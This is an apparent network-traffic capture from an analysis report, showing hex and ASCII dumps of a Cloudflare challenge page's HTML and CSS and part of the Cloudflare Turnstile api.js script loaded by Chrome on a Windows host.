                                                        2024-09-13 13:06:33 UTC1287INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                        2024-09-13 13:06:33 UTC1369INData Raw: 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 2c 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d
                                                        Data Ascii: n-wrapper,body,html{height:100%;margin:0;overflow:hidden;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-
                                                        2024-09-13 13:06:33 UTC1369INData Raw: 6e 2d 64 65 6c 61 79 3a 2e 33 73 7d 23 73 75 63 63 65 73 73 2d 70 72 65 2d 69 7b 68 65 69 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 73 75 63 63 65 73 73 2d 70 72 65 2d 69 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d
                                                        Data Ascii: n-delay:.3s}#success-pre-i{height:30px;width:30px}#success-pre-i line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-
                                                        2024-09-13 13:06:33 UTC1369INData Raw: 74 65 78 74 20 61 3a 76 69 73 69 74 65 64 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78
                                                        Data Ascii: text a:visited,.theme-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-tex
                                                        2024-09-13 13:06:33 UTC1369INData Raw: 2d 64 61 72 6b 20 23 71 72 7b 66 69 6c 6c 3a 23 66 33 38 30 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63
                                                        Data Ascii: -dark #qr{fill:#f38020}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:foc
                                                        2024-09-13 13:06:33 UTC1369INData Raw: 6e 64 65 78 3a 39 39 39 39 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 7d 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 70 78 7d 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d
                                                        Data Ascii: ndex:9999}#challenge-overlay a,#challenge-overlay a:link,#challenge-overlay a:visited{color:#232323}#challenge-overlay a:active,#challenge-overlay a:focus,#challenge-overlay a:hover{color:#166379}#logo{height:25px;margin-bottom:1px}.failure-circle{stroke-
                                                        2024-09-13 13:06:33 UTC1369INData Raw: 61 72 65 61 3a 31 2f 31 3b 68 65 69 67 68 74 3a 32 34 70 78 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 31 73 20 65 61 73 65 2d 69 6e 3b 77 69 64 74 68 3a 32 34 70 78 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 38 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 6c 62 2d 74 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 32 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74
                                                        Data Ascii: area:1/1;height:24px;transition:all .1s ease-in;width:24px;z-index:9998}.cb-lb .cb-i:after{border-radius:5px;content:"";position:absolute}.cb-lb .cb-lb-t{grid-column:2;margin-left:8px}.size-compact{font-size:14px}.size-compact #content{align-items:flex-st
                                                        2024-09-13 13:06:33 UTC1369INData Raw: 65 6e 74 65 72 20 66 6c 65 78 2d 65 6e 64 7d 2e 72 74 6c 7b 64 69 72 65 63 74 69 6f 6e 3a 72 74 6c 7d 2e 72 74 6c 20 2e 63 62 2d 6c 62 2d 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 72 74 6c 20 23 65 78 70 69 72 65 64 2d 69 2c 2e 72 74 6c 20 23 66 61 69 6c 2d 69 2c 2e 72 74 6c 20 23 6f 76 65 72 72 75 6e 2d 69 2c 2e 72 74 6c 20 23 73 70 69 6e 6e 65 72 2d 69 2c 2e 72 74 6c 20 23 73 75 63 63 65 73 73 2d 69 2c 2e 72 74 6c 20 23 74 69 6d 65 6f 75 74 2d 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e
                                                        Data Ascii: enter flex-end}.rtl{direction:rtl}.rtl .cb-lb-t{margin-left:0;margin-right:8px;padding:0}.rtl #expired-i,.rtl #fail-i,.rtl #overrun-i,.rtl #spinner-i,.rtl #success-i,.rtl #timeout-i{left:255px}.rtl #fr-helper{margin-left:.25em;margin-right:0}.rtl #brandin
                                                        2024-09-13 13:06:33 UTC1369INData Raw: 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 77 69 64 74 68 3a 32 30 30 70 78 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20
                                                        Data Ascii: n:absolute;top:0;width:200px}#challenge-error-title a{color:#232323}#challenge-error-title a:active,#challenge-error-title a:focus,#challenge-error-title a:hover{color:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.549740104.18.95.414433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:33 UTC383OUTGET /turnstile/v0/b/388c99dd0998/api.js HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:33 UTC471INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:06:33 GMT
                                                        Content-Type: application/javascript; charset=UTF-8
                                                        Content-Length: 47262
                                                        Connection: close
                                                        accept-ranges: bytes
                                                        last-modified: Wed, 11 Sep 2024 15:58:53 GMT
                                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                        access-control-allow-origin: *
                                                        cross-origin-resource-policy: cross-origin
                                                        Server: cloudflare
                                                        CF-RAY: 8c285af02cfc43c4-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-09-13 13:06:33 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                        Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
                                                        2024-09-13 13:06:33 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 52 72 28 65 2c 72 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                        Data Ascii: e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function tt(e,r){return r=r!=nu
                                                        2024-09-13 13:06:33 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 72 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 48 74 28 65 29 7c 7c 42 74 28 65 2c 72 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 6a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                        Data Ascii: ray$/.test(a))return rt(e,r)}}function Ae(e,r){return Ht(e)||Bt(e,r)||qt(e,r)||jt()}function P(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var a={label:0,sent:function(){if(l[0
                                                        2024-09-13 13:06:33 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 47 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                        Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Gt=300020;var Pe=300030;var Ue=300031;var q;(fu
                                                        2024-09-13 13:06:33 UTC1369INData Raw: 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6f 65 3b 28 66 75 6e
                                                        Data Ascii: e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var oe;(fun
                                                        2024-09-13 13:06:33 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73
                                                        Data Ascii: function gt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&r.s
                                                        2024-09-13 13:06:33 UTC1369INData Raw: 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4c 28 43 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 66 2c 70 3d 4c 28 4e 72 2c 28 66 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c
                                                        Data Ascii: ==Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES,l,g=L(Cr,(l=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),f,p=L(Nr,(f=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==nul
                                                        2024-09-13 13:06:33 UTC1369INData Raw: 7b 72 65 74 75 72 6e 20 42 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 66 3d 5b 6e 75 6c 6c 5d 3b 66 2e 70 75 73 68 2e 61 70 70 6c 79 28 66 2c 6c 29 3b 76 61 72 20 70 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 66 29 2c 73 3d 6e 65 77 20 70 3b 72 65 74 75 72 6e 20 67 26 26 4a 28 73 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e
                                                        Data Ascii: {return Be()?Ie=Reflect.construct:Ie=function(c,l,g){var f=[null];f.push.apply(f,l);var p=Function.bind.apply(c,f),s=new p;return g&&J(s,g.prototype),s},Ie.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Object.getPrototypeOf:function
                                                        2024-09-13 13:06:33 UTC1369INData Raw: 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69 66 28 55 28
                                                        Data Ascii: tion b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}function Tt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=document.currentScript;if(U(
